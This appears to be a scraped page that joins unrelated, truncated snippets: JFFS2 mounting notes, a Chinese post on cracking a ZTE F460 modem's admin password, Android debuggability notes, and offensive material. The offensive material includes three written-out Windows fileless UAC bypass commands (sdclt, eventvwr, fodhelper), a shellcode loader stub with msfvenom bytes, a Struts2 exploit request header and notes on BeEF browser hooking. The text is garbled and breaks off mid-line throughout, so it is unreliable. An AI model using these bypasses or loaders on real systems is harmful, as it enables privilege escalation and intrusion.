Malayke

Mounting JFFS2 Images on a Linux PC

It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.

This procedure requires that the following kernel modules are available or built-in to the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.

Mounting JFFS2 Images using RAM

One method of mounting JFFS2 images uses the mt

之前用的光猫不小心进水烧坏了，然后搞了个中兴 F460 拿来用，网上办法多如牛毛，但是试了都不行电信贼的很，只要注册 LOID 之后他就把 telnet 给你关了，然后啥也搞不成，今天琢磨了一整天成功拿到telecomadmin密码，并能随时TELNET进路由器。

为什么要破解？

不破解就有普通用户权限，除了Wi-Fi密码，什么也改不了, 而且 Wi-Fi 名称必须得 ChinaNet 开头，更要命的是电信可以随时远程控制路由器

怎么破解？

最简单的办法是有线或无线连接到路由器后访问 http://192.168.1.1/web_shell_cmd.gch 然后执行以下命令来获取超级用户密码

How to make a Release Android App debuggable

Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage ( or adb shell run-as com.mypackge ls /data/data/com.mypackage/shared_prefs), but on a production release app downloaded from an app store you're most likely to see:

run-as: Package 'com.mypackage' is not debuggable

	#sdclt fileless UAC bypass
	regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
	#eventvwr fileless UAC bypass
	%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
	#fodhelper fileless UAC bypass
	New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\

	#pragma comment(lib, "Shell32.lib")
	#include <windows.h>
	#include <shlobj.h>

	// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
	int buf_len = 193;
	unsigned char buf[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
	"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

	import requests
	import json
	import pprint
	import sys
	import dns.message
	import dns.query
	import dns.rdatatype
	import dns.resolver
	import dns.reversename
	import time

	After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

	These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

	Basic gist after running PS script statements:

	- Loads C# project from file or web URL
	- Create various tmp files
	- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
	- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]

	import frida, sys

	def on_message(message, data):
	if message['type'] == 'send':
	print("[*] {0}".format(message['payload']))
	else:
	print(message)

	jscode = """
	Java.perform(function() {

	POST /struts2-rest-showcase/orders/3 HTTP/1.1
	Host: localhost:8080
	Content-Length: 1670
	Cache-Control: max-age=0
	Origin: http://localhost:8080
	Upgrade-Insecure-Requests: 1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
	Content-Type: application/xml
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
	DNT: 1

	Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client

	https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM

	window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24

	Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67

	Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503